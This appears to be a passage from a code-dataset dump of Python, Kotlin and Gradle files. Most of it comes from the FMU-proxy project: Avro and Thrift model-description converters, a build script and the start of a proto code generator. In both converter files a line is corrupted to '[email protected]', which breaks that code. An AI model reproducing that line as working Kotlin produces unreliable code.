;;\n\n *)\n echo \"Invalid option. Exiting..\"\n exit 1\nesac\n" }, { "alpha_fraction": 0.6815286874771118, "alphanum_fraction": 0.6815286874771118, "avg_line_length": 18.75, "blob_id": "d2231bc397f659779a5a4d8bfa4dc969e3e4bc06", "content_id": "84983ed56ac012088cda96f60f3a0c737994c377", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 157, "license_type": "no_license", "max_line_length": 54, "num_lines": 8, "path": "/django/users/urls.py", "repo_name": "LarryMasc/lankinc", "src_encoding": "UTF-8", "text": "from django.urls import path, include\n\napp_name = 'users'\nfrom .views import signup\n\nurlpatterns = [\n path('signup/', signup.as_view(), name = \"signup\")\n]" } ]
13
johanrhodin/FMU-proxy
https://github.com/johanrhodin/FMU-proxy
d7ac234c5dbb2b0c8259cc7d331044c474487a5e
7f792a04bba6cd810d45f92a2f1f48034fb95009
c1b763765f1d613d01a276d78eacf1cc9db680ef
refs/heads/master
2020-03-20T20:59:59.611869
2018-06-08T11:56:32
2018-06-08T11:56:32
137,718,038
0
0
null
2018-06-18T06:41:37
2018-06-08T11:56:36
2018-06-15T08:42:04
null
[ { "alpha_fraction": 0.737044632434845, "alphanum_fraction": 0.7392680048942566, "avg_line_length": 40.76785659790039, "blob_id": "29c70838140704d8a0aaefd62f88bbeb69235b46", "content_id": "01aff94cf7fbff98a87a671941d8fcd5920b8764", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 11694, "license_type": "permissive", "max_line_length": 123, "num_lines": 280, "path": "/java/FMU-proxy/fmu-proxy-clients/src/main/kotlin/no/mechatronics/sfi/fmuproxy/avro/extensions.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology (NTNU)\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.avro\n\nimport no.mechatronics.sfi.fmi4j.common.*\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmi4j.modeldescription.misc.LogCategories\nimport no.mechatronics.sfi.fmi4j.modeldescription.misc.DefaultExperiment\nimport no.mechatronics.sfi.fmi4j.modeldescription.misc.VariableNamingConvention\nimport no.mechatronics.sfi.fmi4j.modeldescription.structure.DependenciesKind\nimport no.mechatronics.sfi.fmi4j.modeldescription.structure.ModelStructure\nimport no.mechatronics.sfi.fmi4j.modeldescription.structure.Unknown\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.*\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.BooleanAttribute\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.Causality\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.EnumerationAttribute\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.Initial\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.IntegerAttribute\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.RealAttribute\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.ScalarVariable\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.StringAttribute\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.Variability\nimport no.mechatronics.sfi.fmuproxy.Solver\n\ninternal fun Status.convert(): FmiStatus {\n return when(this) {\n Status.OK_STATUS -> FmiStatus.OK\n Status.DISCARD_STATUS -> FmiStatus.Discard\n Status.ERROR_STATUS -> FmiStatus.Error\n Status.WARNING_STATUS -> FmiStatus.Warning\n Status.PENDING_STATUS -> FmiStatus.Pending\n Status.FATAL_STATUS -> FmiStatus.Fatal\n }\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.avro.DependenciesKind.convert(): DependenciesKind {\n return when(this) {\n no.mechatronics.sfi.fmuproxy.avro.DependenciesKind.CONSTANT_KIND -> DependenciesKind.CONSTANT\n no.mechatronics.sfi.fmuproxy.avro.DependenciesKind.DEPENDENT_KIND -> DependenciesKind.DEPENDENT\n no.mechatronics.sfi.fmuproxy.avro.DependenciesKind.DISCRETE_KIND -> DependenciesKind.DISCRETE\n no.mechatronics.sfi.fmuproxy.avro.DependenciesKind.TUNABLE_KIND -> DependenciesKind.TUNABLE\n }\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.avro.VariableNamingConvention.convert(): VariableNamingConvention {\n return when(this) {\n no.mechatronics.sfi.fmuproxy.avro.VariableNamingConvention.FLAT -> VariableNamingConvention.FLAT\n no.mechatronics.sfi.fmuproxy.avro.VariableNamingConvention.STRUCTURED -> VariableNamingConvention.STRUCTURED\n }\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.avro.Causality.convert(): Causality {\n return when(this) {\n no.mechatronics.sfi.fmuproxy.avro.Causality.CALCULATED_PARAMETER_CAUSALITY -> Causality.CALCULATED_PARAMETER\n no.mechatronics.sfi.fmuproxy.avro.Causality.INDEPENDENT_CAUSALITY -> Causality.INDEPENDENT\n no.mechatronics.sfi.fmuproxy.avro.Causality.INPUT_CAUSALITY -> Causality.INPUT\n no.mechatronics.sfi.fmuproxy.avro.Causality.LOCAL_CAUSALITY -> Causality.LOCAL\n no.mechatronics.sfi.fmuproxy.avro.Causality.OUTPUT_CAUSALITY -> Causality.OUTPUT\n no.mechatronics.sfi.fmuproxy.avro.Causality.PARAMETER_CAUSALITY -> Causality.PARAMETER\n }\n}\n\n\ninternal fun no.mechatronics.sfi.fmuproxy.avro.Variability.convert(): Variability {\n return when(this) {\n no.mechatronics.sfi.fmuproxy.avro.Variability.CONSTANT_VARIABILITY -> Variability.CONSTANT\n no.mechatronics.sfi.fmuproxy.avro.Variability.CONTINUOUS_VARIABILITY -> Variability.CONTINUOUS\n no.mechatronics.sfi.fmuproxy.avro.Variability.DISCRETE_VARIABILITY -> Variability.DISCRETE\n no.mechatronics.sfi.fmuproxy.avro.Variability.FIXED_VARIABILITY -> Variability.FIXED\n no.mechatronics.sfi.fmuproxy.avro.Variability.TUNABLE_VARIABILITY -> Variability.TUNABLE\n }\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.avro.Initial.convert(): Initial {\n return when(this) {\n no.mechatronics.sfi.fmuproxy.avro.Initial.APPROX_INITIAL -> Initial.APPROX\n no.mechatronics.sfi.fmuproxy.avro.Initial.CALCULATED_INITIAL -> Initial.CALCULATED\n no.mechatronics.sfi.fmuproxy.avro.Initial.EXACT_INITIAL -> Initial.EXACT\n }\n}\n\ninternal fun IntegerRead.convert(): FmuIntegerRead {\n return FmuIntegerRead(value, status.convert())\n}\n\ninternal fun IntegerArrayRead.convert(): FmuIntegerArrayRead {\n return FmuIntegerArrayRead(value.toIntArray(), status.convert())\n}\n\ninternal fun RealRead.convert(): FmuRealRead {\n return FmuRealRead(value, status.convert())\n}\n\ninternal fun RealArrayRead.convert(): FmuRealArrayRead {\n return FmuRealArrayRead(value.toDoubleArray(), status.convert())\n}\n\ninternal fun StringRead.convert(): FmuStringRead {\n return FmuStringRead(value, status.convert())\n}\n\ninternal fun StringArrayRead.convert(): FmuStringArrayRead {\n return FmuStringArrayRead(value.toTypedArray(), status.convert())\n}\n\ninternal fun BooleanRead.convert(): FmuBooleanRead {\n return FmuBooleanRead(value, status.convert())\n}\n\ninternal fun BooleanArrayRead.convert(): FmuBooleanArrayRead {\n return FmuBooleanArrayRead(value.toBooleanArray(), status.convert())\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.avro.DefaultExperiment.convert(): DefaultExperiment {\n return DefaultExperiment(\n startTime = startTime,\n stopTime = stopTime,\n tolerance = tolerance,\n stepSize = stepSize\n )\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.avro.Unknown.convert(): Unknown {\n return object: Unknown {\n override val dependencies: List<Int>\n get() = getDependencies() ?: emptyList()\n override val dependenciesKind: DependenciesKind?\n get() = getDependenciesKind()?.convert()\n override val index: Int\n get() = getIndex()\n }\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.avro.ModelStructure.convert(): ModelStructure {\n return object: ModelStructure {\n override val derivatives: List<Unknown>\n get() = getDerivatives()?.map { it.convert() } ?: emptyList()\n override val initialUnknowns: List<Unknown>\n get() = getInitialUnknowns()?.map { it.convert() } ?: emptyList()\n override val outputs: List<Unknown>\n get() = getOutputs()?.map { it.convert() } ?: emptyList()\n }\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.avro.IntegerAttribute.convert(): IntegerAttribute {\n return IntegerAttribute(\n min = min,\n max = max,\n start = start\n )\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.avro.RealAttribute.convert(): RealAttribute {\n return RealAttribute(\n min = min,\n max = max,\n start = start\n )\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.avro.StringAttribute.convert(): StringAttribute {\n return StringAttribute(\n start = start\n )\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.avro.BooleanAttribute.convert(): BooleanAttribute {\n return BooleanAttribute(\n start = start\n )\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.avro.EnumerationAttribute.convert(): EnumerationAttribute {\n return EnumerationAttribute(\n min = min,\n max = max,\n start = start\n )\n}\n\n\ninternal fun no.mechatronics.sfi.fmuproxy.avro.ScalarVariable.convert(): TypedScalarVariable<*> {\n\n val v = ScalarVariableImpl(\n name = name,\n description = description,\n valueReference = valueReference,\n declaredType = declaredType,\n causality = causality?.convert(),\n variability = variability?.convert(),\n initial = initial?.convert()\n )\n\n val attribute = attribute\n when (attribute) {\n is no.mechatronics.sfi.fmuproxy.avro.IntegerAttribute -> v.integerAttribute = attribute.convert()\n is no.mechatronics.sfi.fmuproxy.avro.RealAttribute -> v.realAttribute = attribute.convert()\n is no.mechatronics.sfi.fmuproxy.avro.StringAttribute -> v.stringAttribute = attribute.convert()\n is no.mechatronics.sfi.fmuproxy.avro.BooleanAttribute -> v.booleanAttribute = attribute.convert()\n is no.mechatronics.sfi.fmuproxy.avro.EnumerationAttribute -> v.enumerationAttribute = attribute.convert()\n else -> throw AssertionError()\n }\n\n return v.toTyped()\n\n}\n\ninternal fun List<no.mechatronics.sfi.fmuproxy.avro.ScalarVariable>.convert(): ModelVariables {\n return object : ModelVariables {\n override val variables: List<TypedScalarVariable<*>> by lazy {\n [email protected] { it.convert() }\n }\n }\n}\n\ninternal fun ModelDescription.convert(): CommonModelDescription {\n return AvroModelDescription(this)\n}\n\nclass AvroModelDescription(\n val modelDescription: ModelDescription\n): CommonModelDescription {\n\n override val author: String?\n get() = modelDescription.author\n override val copyright: String?\n get() = modelDescription.copyright\n override val defaultExperiment: DefaultExperiment? = modelDescription.defaultExperiment?.convert()\n override val description: String?\n get() = modelDescription.description\n override val fmiVersion: String\n get() = modelDescription.fmiVersion\n override val generationDateAndTime: String?\n get() = modelDescription.generationDateAndTime\n override val generationTool: String?\n get() = modelDescription.generationTool\n override val guid: String\n get() = modelDescription.guid\n override val license: String?\n get() = modelDescription.license\n override val logCategories: LogCategories?\n get() = null\n override val modelName: String\n get() = modelDescription.modelName\n override val modelStructure: ModelStructure = modelDescription.modelStructure.convert()\n override val modelVariables: ModelVariables = modelDescription.modelVariables.convert()\n override val supportsCoSimulation: Boolean\n get() = modelDescription.supportsCoSimulation\n override val supportsModelExchange: Boolean\n get() = modelDescription.supportsModelExchange\n override val variableNamingConvention: VariableNamingConvention? = modelDescription.variableNamingConvention?.convert()\n override val version: String?\n get() = modelDescription.version\n}\n\nfun Solver.avroType(): no.mechatronics.sfi.fmuproxy.avro.Solver {\n return no.mechatronics.sfi.fmuproxy.avro.Solver(name, settings)\n}" }, { "alpha_fraction": 0.7431055903434753, "alphanum_fraction": 0.7463353872299194, "avg_line_length": 42.753623962402344, "blob_id": "2f39da436a41da5156620c64a38be751ee5a01c0", "content_id": "87348ca5e3a6a9ee19a05ad996fbeb051628c468", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 12075, "license_type": "permissive", "max_line_length": 171, "num_lines": 276, "path": "/java/FMU-proxy/fmu-proxy-clients/src/main/kotlin/no/mechatronics/sfi/fmuproxy/thrift/extensions.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology (NTNU)\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.thrift\n\nimport no.mechatronics.sfi.fmi4j.common.*\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmi4j.modeldescription.misc.LogCategories\nimport no.mechatronics.sfi.fmi4j.modeldescription.structure.ModelStructure\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.*\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.BooleanAttribute\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.Causality\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.EnumerationAttribute\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.Initial\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.IntegerAttribute\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.RealAttribute\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.StringAttribute\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.Variability\nimport no.mechatronics.sfi.fmuproxy.Solver\n\n\ninternal fun Status.convert(): FmiStatus {\n return when(this) {\n Status.OK_STATUS -> FmiStatus.OK\n Status.DISCARD_STATUS -> FmiStatus.Discard\n Status.ERROR_STATUS -> FmiStatus.Error\n Status.WARNING_STATUS -> FmiStatus.Warning\n Status.PENDING_STATUS -> FmiStatus.Pending\n Status.FATAL_STATUS -> FmiStatus.Fatal\n }\n}\n\n\ninternal fun no.mechatronics.sfi.fmuproxy.thrift.Causality.convert(): Causality {\n return when(this) {\n no.mechatronics.sfi.fmuproxy.thrift.Causality.CALCULATED_PARAMETER_CAUSALITY -> Causality.CALCULATED_PARAMETER\n no.mechatronics.sfi.fmuproxy.thrift.Causality.INDEPENDENT_CAUSALITY -> Causality.INDEPENDENT\n no.mechatronics.sfi.fmuproxy.thrift.Causality.INPUT_CAUSALITY -> Causality.INPUT\n no.mechatronics.sfi.fmuproxy.thrift.Causality.LOCAL_CAUSALITY -> Causality.LOCAL\n no.mechatronics.sfi.fmuproxy.thrift.Causality.OUTPUT_CAUSALITY -> Causality.OUTPUT\n no.mechatronics.sfi.fmuproxy.thrift.Causality.PARAMETER_CAUSALITY -> Causality.PARAMETER\n }\n}\n\n\ninternal fun no.mechatronics.sfi.fmuproxy.thrift.Variability.convert(): Variability {\n return when(this) {\n no.mechatronics.sfi.fmuproxy.thrift.Variability.CONSTANT_VARIABILITY -> Variability.CONSTANT\n no.mechatronics.sfi.fmuproxy.thrift.Variability.CONTINUOUS_VARIABILITY -> Variability.CONTINUOUS\n no.mechatronics.sfi.fmuproxy.thrift.Variability.DISCRETE_VARIABILITY -> Variability.DISCRETE\n no.mechatronics.sfi.fmuproxy.thrift.Variability.FIXED_VARIABILITY -> Variability.FIXED\n no.mechatronics.sfi.fmuproxy.thrift.Variability.TUNABLE_VARIABILITY -> Variability.TUNABLE\n }\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.thrift.Initial.convert(): Initial {\n return when(this) {\n no.mechatronics.sfi.fmuproxy.thrift.Initial.APPROX_INITIAL -> Initial.APPROX\n no.mechatronics.sfi.fmuproxy.thrift.Initial.CALCULATED_INITIAL -> Initial.CALCULATED\n no.mechatronics.sfi.fmuproxy.thrift.Initial.EXACT_INITIAL -> Initial.EXACT\n }\n}\n\ninternal fun DependenciesKind.convert(): no.mechatronics.sfi.fmi4j.modeldescription.structure.DependenciesKind {\n return when(this) {\n no.mechatronics.sfi.fmuproxy.thrift.DependenciesKind.CONSTANT_KIND -> no.mechatronics.sfi.fmi4j.modeldescription.structure.DependenciesKind.CONSTANT\n no.mechatronics.sfi.fmuproxy.thrift.DependenciesKind.DEPENDENT_KIND -> no.mechatronics.sfi.fmi4j.modeldescription.structure.DependenciesKind.DEPENDENT\n no.mechatronics.sfi.fmuproxy.thrift.DependenciesKind.DISCRETE_KIND -> no.mechatronics.sfi.fmi4j.modeldescription.structure.DependenciesKind.DISCRETE\n no.mechatronics.sfi.fmuproxy.thrift.DependenciesKind.TUNABLE_KIND ->no.mechatronics.sfi.fmi4j.modeldescription.structure. DependenciesKind.TUNABLE\n }\n}\n\ninternal fun VariableNamingConvention.convert(): no.mechatronics.sfi.fmi4j.modeldescription.misc.VariableNamingConvention {\n return when(this) {\n VariableNamingConvention.FLAT -> no.mechatronics.sfi.fmi4j.modeldescription.misc.VariableNamingConvention.FLAT\n VariableNamingConvention.STRUCTURED -> no.mechatronics.sfi.fmi4j.modeldescription.misc.VariableNamingConvention.STRUCTURED\n }\n}\n\ninternal fun IntegerRead.convert(): FmuIntegerRead {\n return FmuIntegerRead(value, status.convert())\n}\n\ninternal fun IntegerArrayRead.convert(): FmuIntegerArrayRead {\n return FmuIntegerArrayRead(value.toIntArray(), status.convert())\n}\n\ninternal fun RealRead.convert(): FmuRealRead {\n return FmuRealRead(value, status.convert())\n}\n\ninternal fun RealArrayRead.convert(): FmuRealArrayRead {\n return FmuRealArrayRead(value.toDoubleArray(), status.convert())\n}\n\ninternal fun StringRead.convert(): FmuStringRead {\n return FmuStringRead(value, status.convert())\n}\n\ninternal fun StringArrayRead.convert(): FmuStringArrayRead {\n return FmuStringArrayRead(value.toTypedArray(), status.convert())\n}\n\ninternal fun BooleanRead.convert(): FmuBooleanRead {\n return FmuBooleanRead(isValue, status.convert())\n}\n\ninternal fun BooleanArrayRead.convert(): FmuBooleanArrayRead {\n return FmuBooleanArrayRead(value.toBooleanArray(), status.convert())\n}\n\ninternal fun DefaultExperiment.convert(): no.mechatronics.sfi.fmi4j.modeldescription.misc.DefaultExperiment {\n return no.mechatronics.sfi.fmi4j.modeldescription.misc.DefaultExperiment(\n startTime = startTime,\n stopTime = stopTime,\n tolerance = tolerance,\n stepSize = stepSize\n )\n}\n\ninternal fun Unknown.convert(): no.mechatronics.sfi.fmi4j.modeldescription.structure.Unknown {\n return object: no.mechatronics.sfi.fmi4j.modeldescription.structure.Unknown {\n override val dependencies: List<Int>\n get() = getDependencies() ?: emptyList()\n override val dependenciesKind: no.mechatronics.sfi.fmi4j.modeldescription.structure.DependenciesKind?\n get() = getDependenciesKind()?.convert()\n override val index: Int\n get() = getIndex()\n }\n}\n\n\ninternal fun no.mechatronics.sfi.fmuproxy.thrift.ModelStructure.convert(): ModelStructure {\n return object: ModelStructure {\n override val derivatives: List<no.mechatronics.sfi.fmi4j.modeldescription.structure.Unknown>\n get() = getDerivatives()?.map { it.convert() } ?: emptyList()\n override val initialUnknowns: List<no.mechatronics.sfi.fmi4j.modeldescription.structure.Unknown>\n get() = getInitialUnknowns()?.map { it.convert() } ?: emptyList()\n override val outputs: List<no.mechatronics.sfi.fmi4j.modeldescription.structure.Unknown>\n get() = getOutputs()?.map { it.convert() } ?: emptyList()\n }\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.thrift.IntegerAttribute.convert(): IntegerAttribute {\n return IntegerAttribute(\n min = min,\n max = max,\n start = start\n )\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.thrift.RealAttribute.convert(): RealAttribute {\n return RealAttribute(\n min = min,\n max = max,\n start = start\n )\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.thrift.StringAttribute.convert(): StringAttribute {\n return StringAttribute(\n start = start\n )\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.thrift.BooleanAttribute.convert(): BooleanAttribute {\n return BooleanAttribute(\n start = isStart\n )\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.thrift.EnumerationAttribute.convert(): EnumerationAttribute {\n return EnumerationAttribute(\n min = min,\n max = max,\n start = start\n )\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.thrift.ScalarVariable.convert(): TypedScalarVariable<*> {\n\n val v = ScalarVariableImpl(\n name = name,\n description = description,\n valueReference = valueReference,\n declaredType = declaredType,\n causality = causality?.convert(),\n variability = variability?.convert(),\n initial = initial?.convert()\n )\n\n when {\n attribute.isSetIntegerAttribute -> v.integerAttribute = attribute.integerAttribute.convert()\n attribute.isSetRealAttribute -> v.realAttribute = attribute.realAttribute.convert()\n attribute.isSetStringAttribute -> v.stringAttribute = attribute.stringAttribute.convert()\n attribute.isSetBooleanAttribute -> v.booleanAttribute = attribute.booleanAttribute.convert()\n attribute.isSetEnumerationAttribute -> v.enumerationAttribute = attribute.enumerationAttribute.convert()\n else -> throw AssertionError(\"All attributes are null!\")\n }\n\n return v.toTyped()\n\n}\n\ninternal fun List<no.mechatronics.sfi.fmuproxy.thrift.ScalarVariable>.convert(): ModelVariables {\n return object : ModelVariables {\n override val variables: List<TypedScalarVariable<*>> by lazy {\n [email protected] { it.convert() }\n }\n }\n}\n\ninternal fun ModelDescription.convert(): CommonModelDescription {\n return ThriftModelDescription(this)\n}\n\nclass ThriftModelDescription(\n val modelDescription: ModelDescription\n): CommonModelDescription {\n\n override val author: String?\n get() = modelDescription.author\n override val copyright: String?\n get() = modelDescription.copyright\n override val defaultExperiment: no.mechatronics.sfi.fmi4j.modeldescription.misc.DefaultExperiment? = modelDescription.defaultExperiment?.convert()\n override val description: String?\n get() = modelDescription.description\n override val fmiVersion: String\n get() = modelDescription.fmiVersion\n override val generationDateAndTime: String?\n get() = modelDescription.generationDateAndTime\n override val generationTool: String?\n get() = modelDescription.generationTool\n override val guid: String\n get() = modelDescription.guid\n override val license: String?\n get() = modelDescription.license\n override val logCategories: LogCategories?\n get() = null\n override val modelName: String\n get() = modelDescription.modelName\n override val modelStructure: ModelStructure = modelDescription.modelStructure.convert()\n override val modelVariables: ModelVariables = modelDescription.modelVariables.convert()\n override val supportsCoSimulation: Boolean\n get() = modelDescription.isSupportsCoSimulation\n override val supportsModelExchange: Boolean\n get() = modelDescription.isSupportsModelExchange\n override val variableNamingConvention: no.mechatronics.sfi.fmi4j.modeldescription.misc.VariableNamingConvention? = modelDescription.variableNamingConvention?.convert()\n override val version: String?\n get() = modelDescription.version\n}\n\nfun Solver.thriftType(): no.mechatronics.sfi.fmuproxy.thrift.Solver {\n return no.mechatronics.sfi.fmuproxy.thrift.Solver(name, settings)\n}" }, { "alpha_fraction": 0.6102903485298157, "alphanum_fraction": 0.6316862106323242, "avg_line_length": 19.216495513916016, "blob_id": "421aeb0425d87b9912a8e9bbb0998adfcca41f57", "content_id": "350ba1c007b983f40b76e50f3dbfd52a81f81522", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 1963, "license_type": "permissive", "max_line_length": 109, "num_lines": 97, "path": "/java/FMU-proxy/fmu-proxy-gen/src/main/resources/build.gradle", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "\nprintln \"Gradle version is ${GradleVersion.current().version}\"\n\nbuildscript {\n ext.kotlin_version = '1.2.41'\n\n repositories {\n mavenCentral()\n }\n dependencies {\n classpath \"org.jetbrains.kotlin:kotlin-gradle-plugin:$kotlin_version\"\n }\n}\n\nbuildscript {\n repositories {\n jcenter()\n }\n dependencies {\n classpath 'com.github.jengelman.gradle.plugins:shadow:2.0.4'\n }\n}\n\nbuildscript {\n repositories {\n mavenCentral()\n }\n dependencies {\n classpath 'com.google.protobuf:protobuf-gradle-plugin:0.8.5'\n }\n}\n\napply plugin: 'kotlin'\napply plugin: 'application'\napply plugin: 'com.google.protobuf'\napply plugin: 'com.github.johnrengelman.shadow'\n\nmainClassName = \"no.mechatronics.sfi.fmuproxy.Main\"\n\nwrapper {\n gradleVersion = '4.7'\n}\n\nconfigurations.all {\n resolutionStrategy.cacheChangingModulesFor 0, 'seconds'\n}\n\nrepositories {\n mavenCentral()\n maven {\n url \"https://oss.sonatype.org/content/repositories/snapshots/\"\n }\n}\n\ndependencies {\n\n compile \"org.jetbrains.kotlin:kotlin-stdlib-jdk8:$kotlin_version\"\n\n compile group: 'no.mechatronics.sfi.fmuproxy', name: 'fmu-proxy', version: '0.1-SNAPSHOT', changing: true\n\n implementation group: 'org.slf4j', name: 'slf4j-api', version: '1.7.25'\n runtimeOnly group: 'org.slf4j', name: 'slf4j-log4j12', version: '1.7.25'\n\n}\n\ncompileKotlin {\n kotlinOptions.jvmTarget = \"1.8\"\n}\ncompileTestKotlin {\n kotlinOptions.jvmTarget = \"1.8\"\n}\n\nshadowJar {\n baseName = project.name\n classifier = null\n version = null\n}\n\nprotobuf {\n generatedFilesBaseDir = \"$projectDir/src\"\n protoc {\n artifact = 'com.google.protobuf:protoc:3.5.1'\n }\n plugins {\n grpc {\n artifact = 'io.grpc:protoc-gen-grpc-java:1.12.0'\n }\n }\n generateProtoTasks {\n\n ofSourceSet('main')*.plugins {\n grpc {\n outputSubDir = 'java'\n }\n }\n }\n\n}\n\n" }, { "alpha_fraction": 0.6720321774482727, "alphanum_fraction": 0.6767270565032959, "avg_line_length": 35.814815521240234, "blob_id": "1afa9502f1f0cc7b2f45d3f5052f9203308ffcf4", "content_id": "23ea593af06986843bc35b5adc3e8b1aa85a3af7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 2982, "license_type": "permissive", "max_line_length": 113, "num_lines": 81, "path": "/java/FMU-proxy/fmu-proxy-gen/src/main/kotlin/no/mechatronics/sfi/fmuproxy/codegen/ProtoGen.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.codegen\n\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmuproxy.PROTO_SRC_OUTPUT_FOLDER\nimport no.mechatronics.sfi.fmuproxy.utils.FileFuture\nimport no.mechatronics.sfi.fmuproxy.utils.getProtoType\nimport no.mechatronics.sfi.fmuproxy.utils.isArray\nimport org.jtwig.JtwigModel\nimport org.jtwig.JtwigTemplate\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.io.File\n\n\n/**\n *\n * @author Lars Ivar Hatledal\n */\nobject ProtoGen {\n\n private val LOG: Logger = LoggerFactory.getLogger(ProtoGen::class.java)\n\n fun generateProtoCode(modelDescription: CommonModelDescription, baseFile: File) {\n\n val instanceServices = StringBuilder().apply {\n\n modelDescription.modelVariables.forEach({\n val isArray = isArray(it.name)\n if (!isArray) {\n\n append(\"\"\"\n rpc Read_${convertName(it.name)} (UInt) returns 